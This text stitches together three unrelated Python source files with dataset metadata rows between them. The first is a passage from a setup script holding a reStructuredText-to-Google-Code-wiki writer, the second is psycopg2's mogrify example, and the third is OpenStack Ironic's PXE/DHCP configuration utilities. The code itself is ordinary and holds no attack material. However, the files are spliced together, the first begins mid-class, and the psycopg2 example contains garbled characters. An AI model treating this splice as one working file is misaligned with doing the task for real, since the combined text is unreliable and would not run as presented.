self.list_depth = 0
self.list_item_prefix = None
self.indent = self.old_indent = ''
self.output = []
self.preformat = False
self.section_level = 0
def astext(self):
return ''.join(self.output)
def visit_Text(self, node):
#print "Text", node
data = node.astext()
if not self.preformat:
data = data.lstrip('\n\r')
data = data.replace('\r', '')
data = data.replace('\n', ' ')
self.output.append(data)
def visit_bullet_list(self, node):
self.list_depth += 1
self.list_item_prefix = (' ' * self.list_depth) + '* '
def depart_bullet_list(self, node):
self.list_depth -= 1
if self.list_depth == 0:
self.list_item_prefix = None
else:
self.list_item_prefix = (' ' * self.list_depth) + '* '
self.output.append('\n\n')
def visit_list_item(self, node):
self.old_indent = self.indent
self.indent = self.list_item_prefix
def depart_list_item(self, node):
self.indent = self.old_indent
def visit_literal_block(self, node):
self.output.extend(['{{{', '\n'])
self.preformat = True
def depart_literal_block(self, node):
self.output.extend(['\n', '}}}', '\n\n'])
self.preformat = False
def visit_doctest_block(self, node):
self.output.extend(['{{{', '\n'])
self.preformat = True
def depart_doctest_block(self, node):
self.output.extend(['\n', '}}}', '\n\n'])
self.preformat = False
def visit_paragraph(self, node):
self.output.append(self.indent)
def depart_paragraph(self, node):
self.output.append('\n')
if not isinstance(node.parent, nodes.list_item):
self.output.append('\n')
if self.indent == self.list_item_prefix:
# we're in a sub paragraph of a list item
self.indent = ' ' * self.list_depth
def visit_reference(self, node):
if node.has_key('refuri'):
href = node['refuri']
elif node.has_key('refid'):
href = '#' + node['refid']
else:
href = None
self.output.append('[' + href + ' ')
def depart_reference(self, node):
self.output.append(']')
def _find_header_level(self, node):
if isinstance(node.parent, nodes.topic):
h_level = 2 # ??
elif isinstance(node.parent, nodes.document):
h_level = 1
else:
assert isinstance(node.parent, nodes.section), (
"unexpected parent: %s" % node.parent.__class__)
h_level = self.section_level
return h_level
def _depart_header_node(self, node):
h_level = self._find_header_level(node)
self.output.append(' %s\n\n' % ('='*h_level))
self.list_depth = 0
self.indent = ''
def _visit_header_node(self, node):
h_level = self._find_header_level(node)
self.output.append('%s ' % ('='*h_level))
def visit_subtitle(self, node):
self._visit_header_node(node)
def depart_subtitle(self, node):
self._depart_header_node(node)
def visit_title(self, node):
self._visit_header_node(node)
def depart_title(self, node):
self._depart_header_node(node)
def visit_title_reference(self, node):
self.output.append("`")
def depart_title_reference(self, node):
self.output.append("`")
def visit_section(self, node):
self.section_level += 1
def depart_section(self, node):
self.section_level -= 1
def visit_emphasis(self, node):
self.output.append('*')
def depart_emphasis(self, node):
self.output.append('*')
def visit_literal(self, node):
self.output.append('`')
def depart_literal(self, node):
self.output.append('`')
class publish_docs(Command):
description = "publish documentation to front page of Google Code project"
user_options = [
('google-user=', None, "Google Code username"),
('google-password=', None, "Google Code password"),
]
def initialize_options(self):
self.google_user = None
self.google_password = None
def finalize_options(self):
if self.google_user is None and self.google_password is None:
raise DistutilsOptionError("--google-user and --google-password are required")
def run(self):
summary, doc = pydoc.splitdoc(wsgi_intercept.__doc__)
wikidoc = publish_string(doc, writer=WikiWriter())
print wikidoc
## Google html is so broken that this isn't working :/
# br = Browser()
# br.open('http://code.google.com/p/wsgi-intercept/admin')
# url = br.geturl()
# assert url.startswith('https://www.google.com/accounts/Login'), (
# "unexpected URL: %s" % url)
# log.info("logging in to Google Code...")
# forms = [f for f in br.forms()]
# assert len(forms)==1, "unexpected forms: %s for %s" % (forms, br.geturl())
# br.select_form(nr=0)
# br['Email'] = self.google_user
# br['Passwd'] = self.google_password
# admin = br.submit()
# url = admin.geturl()
# assert url=='http://code.google.com/p/wsgi-intercept/admin', (
# "unexpected URL: %s" % url)
# br.select_form(nr=0)
# br['projectdescription'] = wikidoc
# br.submit()
# print br.geturl()
| apache-2.0 | 7,526,757,896,328,170,000 | 31.889447 | 90 | 0.567609 | false |
kylelwm/ponus | venv/build/psycopg2/examples/mogrify.py | 5 | 1688 | # mogrify.py - test all possible simple type mogrifications
# -*- encoding: latin1 -*-
#
# Copyright (C) 2004-2010 Federico Di Gregorio <[email protected]>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details..
## put in DSN your DSN string
DSN = 'dbname=test'
## don't modify anything below this line (except for experimenting)
import sys, psycopg2
if len(sys.argv) > 1:
DSN = sys.argv[1]
print "Opening connection using dsn:", DSN
conn = psycopg2.connect(DSN)
print "Encoding for this connection is", conn.encoding
curs = conn.cursor()
curs.execute("SELECT %(foo)s AS foo", {'foo':'bar'})
curs.execute("SELECT %(foo)s AS foo", {'foo':None})
curs.execute("SELECT %(foo)s AS foo", {'foo':True})
curs.execute("SELECT %(foo)s AS foo", {'foo':42})
curs.execute("SELECT %(foo)s AS foo", {'foo':u'yatt�!'})
curs.execute("SELECT %(foo)s AS foo", {'foo':u'bar'})
print curs.mogrify("SELECT %(foo)s AS foo", {'foo':'bar'})
print curs.mogrify("SELECT %(foo)s AS foo", {'foo':None})
print curs.mogrify("SELECT %(foo)s AS foo", {'foo':True})
print curs.mogrify("SELECT %(foo)s AS foo", {'foo':42})
print curs.mogrify("SELECT %(foo)s AS foo", {'foo':u'yatt�!'})
print curs.mogrify("SELECT %(foo)s AS foo", {'foo':u'bar'})
conn.rollback()
| mit | -3,911,824,938,929,991,000 | 34.829787 | 73 | 0.69715 | false |
openstack/ironic | ironic/common/pxe_utils.py | 1 | 53205 | #
# Copyright 2014 Rackspace, Inc
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import os
import tempfile
from ironic_lib import utils as ironic_utils
import jinja2
from oslo_concurrency import processutils
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import fileutils
from ironic.common import dhcp_factory
from ironic.common import exception
from ironic.common.glance_service import service_utils
from ironic.common.i18n import _
from ironic.common import image_service as service
from ironic.common import images
from ironic.common import kickstart_utils as ks_utils
from ironic.common import states
from ironic.common import utils
from ironic.conductor import utils as manager_utils
from ironic.conf import CONF
from ironic.drivers.modules import boot_mode_utils
from ironic.drivers.modules import deploy_utils
from ironic.drivers.modules import image_cache
from ironic.drivers import utils as driver_utils
from ironic import objects
LOG = logging.getLogger(__name__)
PXE_CFG_DIR_NAME = CONF.pxe.pxe_config_subdir
DHCP_CLIENT_ID = '61' # rfc2132
DHCP_TFTP_SERVER_NAME = '66' # rfc2132
DHCP_BOOTFILE_NAME = '67' # rfc2132
DHCPV6_BOOTFILE_NAME = '59' # rfc5970
# NOTE(TheJulia): adding note for the bootfile parameter
# field as defined by RFC 5870. No practical examples seem
# available. Neither grub2 or ipxe seem to leverage this.
# DHCPV6_BOOTFILE_PARAMS = '60' # rfc5970
DHCP_TFTP_SERVER_ADDRESS = '150' # rfc5859
DHCP_IPXE_ENCAP_OPTS = '175' # Tentatively Assigned
DHCP_TFTP_PATH_PREFIX = '210' # rfc5071
DEPLOY_KERNEL_RAMDISK_LABELS = ['deploy_kernel', 'deploy_ramdisk']
RESCUE_KERNEL_RAMDISK_LABELS = ['rescue_kernel', 'rescue_ramdisk']
KERNEL_RAMDISK_LABELS = {'deploy': DEPLOY_KERNEL_RAMDISK_LABELS,
'rescue': RESCUE_KERNEL_RAMDISK_LABELS}
def get_root_dir():
"""Returns the directory where the config files and images will live."""
return CONF.pxe.tftp_root
def get_ipxe_root_dir():
return CONF.deploy.http_root
def _ensure_config_dirs_exist(task, ipxe_enabled=False):
"""Ensure that the node's and PXE configuration directories exist.
:param task: A TaskManager instance
:param ipxe_enabled: Default false boolean to indicate if ipxe
is in use by the caller.
"""
if ipxe_enabled:
root_dir = get_ipxe_root_dir()
else:
root_dir = get_root_dir()
node_dir = os.path.join(root_dir, task.node.uuid)
pxe_dir = os.path.join(root_dir, PXE_CFG_DIR_NAME)
# NOTE: We should only change the permissions if the folder
# does not exist. i.e. if defined, an operator could have
# already created it and placed specific ACLs upon the folder
# which may not recurse downward.
for directory in (node_dir, pxe_dir):
if not os.path.isdir(directory):
fileutils.ensure_tree(directory)
if CONF.pxe.dir_permission:
os.chmod(directory, CONF.pxe.dir_permission)
def _link_mac_pxe_configs(task, ipxe_enabled=False):
"""Link each MAC address with the PXE configuration file.
:param task: A TaskManager instance.
:param ipxe_enabled: Default false boolean to indicate if ipxe
is in use by the caller.
"""
def create_link(mac_path):
ironic_utils.unlink_without_raise(mac_path)
relative_source_path = os.path.relpath(
pxe_config_file_path, os.path.dirname(mac_path))
utils.create_link_without_raise(relative_source_path, mac_path)
pxe_config_file_path = get_pxe_config_file_path(
task.node.uuid, ipxe_enabled=ipxe_enabled)
for port in task.ports:
client_id = port.extra.get('client-id')
# Syslinux, ipxe, depending on settings.
create_link(_get_pxe_mac_path(port.address, client_id=client_id,
ipxe_enabled=ipxe_enabled))
# Grub2 MAC address only
for path in _get_pxe_grub_mac_path(port.address,
ipxe_enabled=ipxe_enabled):
create_link(path)
def _link_ip_address_pxe_configs(task, ipxe_enabled=False):
"""Link each IP address with the PXE configuration file.
:param task: A TaskManager instance.
:param ipxe_enabled: Default false boolean to indicate if ipxe
is in use by the caller.
:raises: FailedToGetIPAddressOnPort
:raises: InvalidIPv4Address
"""
pxe_config_file_path = get_pxe_config_file_path(
task.node.uuid,
ipxe_enabled=ipxe_enabled)
api = dhcp_factory.DHCPFactory().provider
ip_addrs = api.get_ip_addresses(task)
if not ip_addrs:
if ip_addrs == []:
LOG.warning("No IP addresses assigned for node %(node)s.",
{'node': task.node.uuid})
else:
LOG.warning(
"DHCP address management is not available for node "
"%(node)s. Operators without Neutron can ignore this "
"warning.",
{'node': task.node.uuid})
# Just in case, reset to empty list if we got nothing.
ip_addrs = []
for port_ip_address in ip_addrs:
ip_address_path = _get_pxe_ip_address_path(port_ip_address)
ironic_utils.unlink_without_raise(ip_address_path)
relative_source_path = os.path.relpath(
pxe_config_file_path, os.path.dirname(ip_address_path))
utils.create_link_without_raise(relative_source_path,
ip_address_path)
def _get_pxe_grub_mac_path(mac, ipxe_enabled=False):
root_dir = get_ipxe_root_dir() if ipxe_enabled else get_root_dir()
yield os.path.join(root_dir, "%s-%s-%s" %
("grub.cfg", "01", mac.replace(':', "-").lower()))
yield os.path.join(root_dir, mac + '.conf')
def _get_pxe_mac_path(mac, delimiter='-', client_id=None,
ipxe_enabled=False):
"""Convert a MAC address into a PXE config file name.
:param mac: A MAC address string in the format xx:xx:xx:xx:xx:xx.
:param delimiter: The MAC address delimiter. Defaults to dash ('-').
:param client_id: client_id indicate InfiniBand port.
Defaults is None (Ethernet)
:param ipxe_enabled: A default False boolean value to tell the method
if the caller is using iPXE.
:returns: the path to the config file.
"""
mac_file_name = mac.replace(':', delimiter).lower()
if not ipxe_enabled:
hw_type = '01-'
if client_id:
hw_type = '20-'
mac_file_name = hw_type + mac_file_name
return os.path.join(get_root_dir(), PXE_CFG_DIR_NAME,
mac_file_name)
return os.path.join(get_ipxe_root_dir(), PXE_CFG_DIR_NAME,
mac_file_name)
def _get_pxe_ip_address_path(ip_address):
"""Convert an ipv4 address into a PXE config file name.
:param ip_address: A valid IPv4 address string in the format 'n.n.n.n'.
:returns: the path to the config file.
"""
# grub2 bootloader needs ip based config file name.
return os.path.join(
CONF.pxe.tftp_root, ip_address + ".conf"
)
def get_kernel_ramdisk_info(node_uuid, driver_info, mode='deploy',
ipxe_enabled=False):
"""Get href and tftp path for deploy or rescue kernel and ramdisk.
:param node_uuid: UUID of the node
:param driver_info: Node's driver_info dict
:param mode: A label to indicate whether paths for deploy or rescue
ramdisk are being requested. Supported values are 'deploy'
'rescue'. Defaults to 'deploy', indicating deploy paths will
be returned.
:param ipxe_enabled: A default False boolean value to tell the method
if the caller is using iPXE.
:returns: a dictionary whose keys are deploy_kernel and deploy_ramdisk or
rescue_kernel and rescue_ramdisk and whose values are the
absolute paths to them.
Note: driver_info should be validated outside of this method.
"""
if ipxe_enabled:
root_dir = get_ipxe_root_dir()
else:
root_dir = get_root_dir()
image_info = {}
labels = KERNEL_RAMDISK_LABELS[mode]
for label in labels:
image_info[label] = (
str(driver_info[label]),
os.path.join(root_dir, node_uuid, label)
)
return image_info
def get_pxe_config_file_path(node_uuid, ipxe_enabled=False):
"""Generate the path for the node's PXE configuration file.
:param node_uuid: the UUID of the node.
:param ipxe_enabled: A default False boolean value to tell the method
if the caller is using iPXE.
:returns: The path to the node's PXE configuration file.
"""
if ipxe_enabled:
return os.path.join(get_ipxe_root_dir(), node_uuid, 'config')
else:
return os.path.join(get_root_dir(), node_uuid, 'config')
def get_file_path_from_label(node_uuid, root_dir, label):
"""Generate absolute paths to various images from their name(label)
This method generates absolute file system path on the conductor where
various images need to be placed. For example the kickstart template, file
and stage2 squashfs.img needs to be placed in the ipxe_root_dir since they
will be transferred by anaconda ramdisk over http(s). The generated paths
will be added to the image_info dictionary as values.
:param node_uuid: the UUID of the node
:param root_dir: Directory in which the image must be placed
:param label: Name of the image
"""
if label == 'ks_template':
return os.path.join(get_ipxe_root_dir(), node_uuid, 'ks.cfg.template')
elif label == 'ks_cfg':
return os.path.join(get_ipxe_root_dir(), node_uuid, 'ks.cfg')
elif label == 'stage2':
return os.path.join(get_ipxe_root_dir(), node_uuid, 'LiveOS',
'squashfs.img')
else:
return os.path.join(root_dir, node_uuid, label)
def get_http_url_path_from_label(http_url, node_uuid, label):
"""Generate http url path to various image artifacts
This method generates http(s) urls for various image artifacts int the
webserver root. The generated urls will be added to the pxe_options dict
and used to render pxe/ipxe configuration templates.
:param http_url: URL to access the root of the webserver
:param node_uuid: the UUID of the node
:param label: Name of the image
"""
if label == 'ks_template':
return '/'.join([http_url, node_uuid, 'ks.cfg.template'])
elif label == 'ks_cfg':
return '/'.join([http_url, node_uuid, 'ks.cfg'])
elif label == 'stage2':
# we store stage2 in http_root/node_uuid/LiveOS/squashfs.img
# Specifying http://host/node_uuid as stage2 url will make anaconda
# automatically load the squashfs.img from LiveOS directory.
return '/'.join([http_url, node_uuid])
else:
return '/'.join([http_url, node_uuid, label])
def create_pxe_config(task, pxe_options, template=None, ipxe_enabled=False):
"""Generate PXE configuration file and MAC address links for it.
This method will generate the PXE configuration file for the task's
node under a directory named with the UUID of that node. For each
MAC address or DHCP IP address (port) of that node, a symlink for
the configuration file will be created under the PXE configuration
directory, so regardless of which port boots first they'll get the
same PXE configuration.
If grub2 bootloader is in use, then its configuration will be created
based on DHCP IP address in the form nn.nn.nn.nn.
:param task: A TaskManager instance.
:param pxe_options: A dictionary with the PXE configuration
parameters.
:param template: The PXE configuration template. If no template is
given the node specific template will be used.
"""
LOG.debug("Building PXE config for node %s", task.node.uuid)
if template is None:
if ipxe_enabled:
template = deploy_utils.get_ipxe_config_template(task.node)
else:
template = deploy_utils.get_pxe_config_template(task.node)
_ensure_config_dirs_exist(task, ipxe_enabled)
pxe_config_file_path = get_pxe_config_file_path(
task.node.uuid,
ipxe_enabled=ipxe_enabled)
is_uefi_boot_mode = (boot_mode_utils.get_boot_mode(task.node)
== 'uefi')
uefi_with_grub = is_uefi_boot_mode and not ipxe_enabled
# grub bootloader panics with '{}' around any of its tags in its
# config file. To overcome that 'ROOT' and 'DISK_IDENTIFIER' are enclosed
# with '(' and ')' in uefi boot mode.
if uefi_with_grub:
pxe_config_root_tag = '(( ROOT ))'
pxe_config_disk_ident = '(( DISK_IDENTIFIER ))'
else:
# TODO(stendulker): We should use '(' ')' as the delimiters for all our
# config files so that we do not need special handling for each of the
# bootloaders. Should be removed once the Mitaka release starts.
pxe_config_root_tag = '{{ ROOT }}'
pxe_config_disk_ident = '{{ DISK_IDENTIFIER }}'
params = {'pxe_options': pxe_options,
'ROOT': pxe_config_root_tag,
'DISK_IDENTIFIER': pxe_config_disk_ident}
pxe_config = utils.render_template(template, params)
utils.write_to_file(pxe_config_file_path, pxe_config)
# Always write the mac addresses
_link_mac_pxe_configs(task, ipxe_enabled=ipxe_enabled)
if uefi_with_grub:
try:
_link_ip_address_pxe_configs(task, ipxe_enabled)
# NOTE(TheJulia): The IP address support will fail if the
# dhcp_provider interface is set to none. This will result
# in the MAC addresses and DHCP files being written, and
# we can remove IP address creation for the grub use.
except exception.FailedToGetIPAddressOnPort as e:
if CONF.dhcp.dhcp_provider != 'none':
with excutils.save_and_reraise_exception():
LOG.error('Unable to create boot config, IP address '
'was unable to be retrieved. %(error)s',
{'error': e})
def create_ipxe_boot_script():
"""Render the iPXE boot script into the HTTP root directory"""
boot_script = utils.render_template(
CONF.pxe.ipxe_boot_script,
{'ipxe_for_mac_uri': PXE_CFG_DIR_NAME + '/'})
bootfile_path = os.path.join(
CONF.deploy.http_root,
os.path.basename(CONF.pxe.ipxe_boot_script))
# NOTE(pas-ha) to prevent unneeded writes,
# only write to file if its content is different from required,
# which should be rather rare
if (not os.path.isfile(bootfile_path)
or not utils.file_has_content(bootfile_path, boot_script)):
utils.write_to_file(bootfile_path, boot_script)
def clean_up_pxe_config(task, ipxe_enabled=False):
"""Clean up the TFTP environment for the task's node.
:param task: A TaskManager instance.
"""
LOG.debug("Cleaning up PXE config for node %s", task.node.uuid)
is_uefi_boot_mode = (boot_mode_utils.get_boot_mode(task.node) == 'uefi')
if is_uefi_boot_mode and not ipxe_enabled:
api = dhcp_factory.DHCPFactory().provider
ip_addresses = api.get_ip_addresses(task)
for port_ip_address in ip_addresses:
try:
# Get xx.xx.xx.xx based grub config file
ip_address_path = _get_pxe_ip_address_path(port_ip_address)
except exception.InvalidIPv4Address:
continue
except exception.FailedToGetIPAddressOnPort:
continue
# Cleaning up config files created for grub2.
ironic_utils.unlink_without_raise(ip_address_path)
for port in task.ports:
client_id = port.extra.get('client-id')
# syslinux, ipxe, etc.
ironic_utils.unlink_without_raise(
_get_pxe_mac_path(port.address, client_id=client_id,
ipxe_enabled=ipxe_enabled))
# Grub2 MAC address based confiuration
for path in _get_pxe_grub_mac_path(port.address,
ipxe_enabled=ipxe_enabled):
ironic_utils.unlink_without_raise(path)
if ipxe_enabled:
utils.rmtree_without_raise(os.path.join(get_ipxe_root_dir(),
task.node.uuid))
else:
utils.rmtree_without_raise(os.path.join(get_root_dir(),
task.node.uuid))
def _dhcp_option_file_or_url(task, urlboot=False, ip_version=None):
"""Returns the appropriate file or URL.
:param task: A TaskManager object.
:param url_boot: Boolean value default False to indicate if a
URL should be returned to the file as opposed
to a file.
:param ip_version: Integer representing the version of IP of
to return options for DHCP. Possible options
are 4, and 6.
"""
try:
if task.driver.boot.ipxe_enabled:
boot_file = deploy_utils.get_ipxe_boot_file(task.node)
else:
boot_file = deploy_utils.get_pxe_boot_file(task.node)
except AttributeError:
# Support boot interfaces that lack an explicit ipxe_enabled
# attribute flag.
boot_file = deploy_utils.get_pxe_boot_file(task.node)
# NOTE(TheJulia): There are additional cases as we add new
# features, so the logic below is in the form of if/elif/elif
if not urlboot:
return boot_file
elif urlboot:
if CONF.my_ipv6 and ip_version == 6:
host = utils.wrap_ipv6(CONF.my_ipv6)
else:
host = utils.wrap_ipv6(CONF.pxe.tftp_server)
return "tftp://{host}/{boot_file}".format(host=host,
boot_file=boot_file)
def dhcp_options_for_instance(task, ipxe_enabled=False, url_boot=False,
ip_version=None):
"""Retrieves the DHCP PXE boot options.
:param task: A TaskManager instance.
:param ipxe_enabled: Default false boolean that signals if iPXE
formatting should be returned by the method
for DHCP server configuration.
:param url_boot: Default false boolean to inform the method if
a URL should be returned to boot the node.
If [pxe]ip_version is set to `6`, then this option
has no effect as url_boot form is required by DHCPv6
standards.
:param ip_version: The IP version of options to return as values
differ by IP version. Default to [pxe]ip_version.
Possible options are integers 4 or 6.
:returns: Dictionary to be sent to the networking service describing
the DHCP options to be set.
"""
if ip_version:
use_ip_version = ip_version
else:
use_ip_version = int(CONF.pxe.ip_version)
dhcp_opts = []
dhcp_provider_name = CONF.dhcp.dhcp_provider
if use_ip_version == 4:
boot_file_param = DHCP_BOOTFILE_NAME
else:
# NOTE(TheJulia): Booting with v6 means it is always
# a URL reply.
boot_file_param = DHCPV6_BOOTFILE_NAME
url_boot = True
# NOTE(TheJulia): The ip_version value config from the PXE config is
# guarded in the configuration, so there is no real sense in having
# anything else here in the event the value is something aside from
# 4 or 6, as there are no other possible values.
boot_file = _dhcp_option_file_or_url(task, url_boot, use_ip_version)
if ipxe_enabled:
# TODO(TheJulia): DHCPv6 through dnsmasq + ipxe matching simply
# does not work as the dhcp client is tracked via a different
# identity mechanism in the exchange. This means if we really
# want ipv6 + ipxe, we should be prepared to build a custom
# iso with ipxe inside. Likely this is more secure and better
# aligns with some of the mega-scale ironic operators.
script_name = os.path.basename(CONF.pxe.ipxe_boot_script)
# TODO(TheJulia): We should make this smarter to handle unwrapped v6
# addresses, since the format is http://[ff80::1]:80/boot.ipxe.
# As opposed to requiring configuration, we can eventually make this
# dynamic, and would need to do similar then.
ipxe_script_url = '/'.join([CONF.deploy.http_url, script_name])
# if the request comes from dumb firmware send them the iPXE
# boot image.
if dhcp_provider_name == 'neutron':
# Neutron use dnsmasq as default DHCP agent. Neutron carries the
# configuration to relate to the tags below. The ipxe6 tag was
# added in the Stein cycle which identifies the iPXE User-Class
# directly and is only sent in DHCPv6.
if use_ip_version != 6:
dhcp_opts.append(
{'opt_name': "tag:!ipxe,%s" % boot_file_param,
'opt_value': boot_file}
)
dhcp_opts.append(
{'opt_name': "tag:ipxe,%s" % boot_file_param,
'opt_value': ipxe_script_url}
)
else:
dhcp_opts.append(
{'opt_name': "tag:!ipxe6,%s" % boot_file_param,
'opt_value': boot_file})
dhcp_opts.append(
{'opt_name': "tag:ipxe6,%s" % boot_file_param,
'opt_value': ipxe_script_url})
else:
# !175 == non-iPXE.
# http://ipxe.org/howto/dhcpd#ipxe-specific_options
if use_ip_version == 6:
LOG.warning('IPv6 is enabled and the DHCP driver appears set '
'to a plugin aside from "neutron". Node %(name)s '
'may not receive proper DHCPv6 provided '
'boot parameters.', {'name': task.node.uuid})
# NOTE(TheJulia): This was added for ISC DHCPd support, however it
# appears that isc support was never added to neutron and is likely
# a down stream driver.
dhcp_opts.append({'opt_name': "!%s,%s" % (DHCP_IPXE_ENCAP_OPTS,
boot_file_param),
'opt_value': boot_file})
dhcp_opts.append({'opt_name': boot_file_param,
'opt_value': ipxe_script_url})
else:
dhcp_opts.append({'opt_name': boot_file_param,
'opt_value': boot_file})
# 210 == tftp server path-prefix or tftp root, will be used to find
# pxelinux.cfg directory. The pxelinux.0 loader infers this information
# from it's own path, but Petitboot needs it to be specified by this
# option since it doesn't use pxelinux.0 loader.
if not url_boot:
dhcp_opts.append(
{'opt_name': DHCP_TFTP_PATH_PREFIX,
'opt_value': get_tftp_path_prefix()})
if not url_boot:
dhcp_opts.append({'opt_name': DHCP_TFTP_SERVER_NAME,
'opt_value': CONF.pxe.tftp_server})
dhcp_opts.append({'opt_name': DHCP_TFTP_SERVER_ADDRESS,
'opt_value': CONF.pxe.tftp_server})
# NOTE(vsaienko) set this option specially for dnsmasq case as it always
# sets `siaddr` field which is treated by pxe clients as TFTP server
# see page 9 https://tools.ietf.org/html/rfc2131.
# If `server-ip-address` is not provided dnsmasq sets `siaddr` to dnsmasq's
# IP which breaks PXE booting as TFTP server is configured on ironic
# conductor host.
# http://thekelleys.org.uk/gitweb/?p=dnsmasq.git;a=blob;f=src/dhcp-common.c;h=eae9ae3567fe16eb979a484976c270396322efea;hb=a3303e196e5d304ec955c4d63afb923ade66c6e8#l572 # noqa
# There is an informational RFC which describes how options related to
# tftp 150,66 and siaddr should be used https://tools.ietf.org/html/rfc5859
# All dhcp servers we've tried: contrail/dnsmasq/isc just silently ignore
# unknown options but potentially it may blow up with others.
# Related bug was opened on Neutron side:
# https://bugs.launchpad.net/neutron/+bug/1723354
if not url_boot:
dhcp_opts.append({'opt_name': 'server-ip-address',
'opt_value': CONF.pxe.tftp_server})
# Append the IP version for all the configuration options
for opt in dhcp_opts:
opt.update({'ip_version': use_ip_version})
return dhcp_opts
def get_tftp_path_prefix():
"""Adds trailing slash (if needed) necessary for path-prefix
:return: CONF.pxe.tftp_root ensured to have a trailing slash
"""
return os.path.join(CONF.pxe.tftp_root, '')
def get_path_relative_to_tftp_root(file_path):
"""Return file relative path to CONF.pxe.tftp_root
:param file_path: full file path to be made relative path.
:returns: The path relative to CONF.pxe.tftp_root
"""
return os.path.relpath(file_path, get_tftp_path_prefix())
def is_ipxe_enabled(task):
"""Return true if ipxe is set.
:param task: A TaskManager object
:returns: boolean true if ``[pxe]ipxe_enabled`` is configured
or if the task driver instance is the iPXE driver.
"""
return 'ipxe_boot' in task.driver.boot.capabilities
def parse_driver_info(node, mode='deploy'):
"""Gets the driver specific Node deployment info.
This method validates whether the 'driver_info' property of the
supplied node contains the required information for this driver to
deploy images to, or rescue, the node.
:param node: a single Node.
:param mode: Label indicating a deploy or rescue operation being
carried out on the node. Supported values are
'deploy' and 'rescue'. Defaults to 'deploy', indicating
deploy operation is being carried out.
:returns: A dict with the driver_info values.
:raises: MissingParameterValue
"""
info = node.driver_info
params_to_check = KERNEL_RAMDISK_LABELS[mode]
d_info = {k: info.get(k) for k in params_to_check}
if not any(d_info.values()):
# NOTE(dtantsur): avoid situation when e.g. deploy_kernel comes from
# driver_info but deploy_ramdisk comes from configuration, since it's
# a sign of a potential operator's mistake.
d_info = {k: getattr(CONF.conductor, k) for k in params_to_check}
error_msg = _("Cannot validate PXE bootloader. Some parameters were"
" missing in node's driver_info and configuration")
deploy_utils.check_for_missing_params(d_info, error_msg)
return d_info
def get_instance_image_info(task, ipxe_enabled=False):
"""Generate the paths for TFTP files for instance related images.
This method generates the paths for instance kernel and
instance ramdisk. This method also updates the node, so caller should
already have a non-shared lock on the node.
:param task: A TaskManager instance containing node and context.
:param ipxe_enabled: Default false boolean to indicate if ipxe
is in use by the caller.
:returns: a dictionary whose keys are the names of the images (kernel,
ramdisk) and values are the absolute paths of them. If it's a whole
disk image or node is configured for localboot,
it returns an empty dictionary.
"""
ctx = task.context
node = task.node
image_info = {}
# NOTE(pas-ha) do not report image kernel and ramdisk for
# local boot or whole disk images so that they are not cached
if (node.driver_internal_info.get('is_whole_disk_image')
or deploy_utils.get_boot_option(node) == 'local'):
return image_info
if ipxe_enabled:
root_dir = get_ipxe_root_dir()
else:
root_dir = get_root_dir()
i_info = node.instance_info
if i_info.get('boot_iso'):
image_info['boot_iso'] = (
i_info['boot_iso'],
os.path.join(root_dir, node.uuid, 'boot_iso'))
return image_info
labels = ('kernel', 'ramdisk')
d_info = deploy_utils.get_image_instance_info(node)
if not (i_info.get('kernel') and i_info.get('ramdisk')):
glance_service = service.GlanceImageService(context=ctx)
iproperties = glance_service.show(d_info['image_source'])['properties']
for label in labels:
i_info[label] = str(iproperties[label + '_id'])
node.instance_info = i_info
node.save()
anaconda_labels = ()
if deploy_utils.get_boot_option(node) == 'kickstart':
# stage2 - Installer stage2 squashfs image
# ks_template - Anaconda kickstart template
# ks_cfg - rendered ks_template
anaconda_labels = ('stage2', 'ks_template', 'ks_cfg')
if not (i_info.get('stage2') and i_info.get('ks_template')):
iproperties = glance_service.show(
d_info['image_source']
)['properties']
for label in anaconda_labels:
# ks_template is an optional property on the image
if (label == 'ks_template'
and not iproperties.get('ks_template')):
i_info[label] = CONF.anaconda.default_ks_template
elif label == 'ks_cfg':
i_info[label] = ''
elif label == 'stage2' and 'stage2_id' not in iproperties:
msg = ("stage2_id property missing on the image. "
"The anaconda deploy interface requires stage2_id "
"property to be associated with the os image. ")
raise exception.ImageUnacceptable(msg)
else:
i_info[label] = str(iproperties['stage2_id'])
node.instance_info = i_info
node.save()
for label in labels + anaconda_labels:
image_info[label] = (
i_info[label],
get_file_path_from_label(node.uuid, root_dir, label)
)
return image_info
def get_image_info(node, mode='deploy', ipxe_enabled=False):
"""Generate the paths for TFTP files for deploy or rescue images.
This method generates the paths for the deploy (or rescue) kernel and
deploy (or rescue) ramdisk.
:param node: a node object
:param mode: Label indicating a deploy or rescue operation being
carried out on the node. Supported values are 'deploy' and 'rescue'.
Defaults to 'deploy', indicating deploy operation is being carried out.
:param ipxe_enabled: A default False boolean value to tell the method
if the caller is using iPXE.
:returns: a dictionary whose keys are the names of the images
(deploy_kernel, deploy_ramdisk, or rescue_kernel, rescue_ramdisk) and
values are the absolute paths of them.
:raises: MissingParameterValue, if deploy_kernel/deploy_ramdisk or
rescue_kernel/rescue_ramdisk is missing in node's driver_info.
"""
d_info = parse_driver_info(node, mode=mode)
return get_kernel_ramdisk_info(
node.uuid, d_info, mode=mode, ipxe_enabled=ipxe_enabled)
def build_deploy_pxe_options(task, pxe_info, mode='deploy',
ipxe_enabled=False):
pxe_opts = {}
node = task.node
kernel_label = '%s_kernel' % mode
ramdisk_label = '%s_ramdisk' % mode
for label, option in ((kernel_label, 'deployment_aki_path'),
(ramdisk_label, 'deployment_ari_path')):
if ipxe_enabled:
image_href = pxe_info[label][0]
if (CONF.pxe.ipxe_use_swift
and service_utils.is_glance_image(image_href)):
pxe_opts[option] = images.get_temp_url_for_glance_image(
task.context, image_href)
else:
pxe_opts[option] = '/'.join([CONF.deploy.http_url, node.uuid,
label])
else:
pxe_opts[option] = get_path_relative_to_tftp_root(
pxe_info[label][1])
if ipxe_enabled:
pxe_opts['initrd_filename'] = ramdisk_label
return pxe_opts
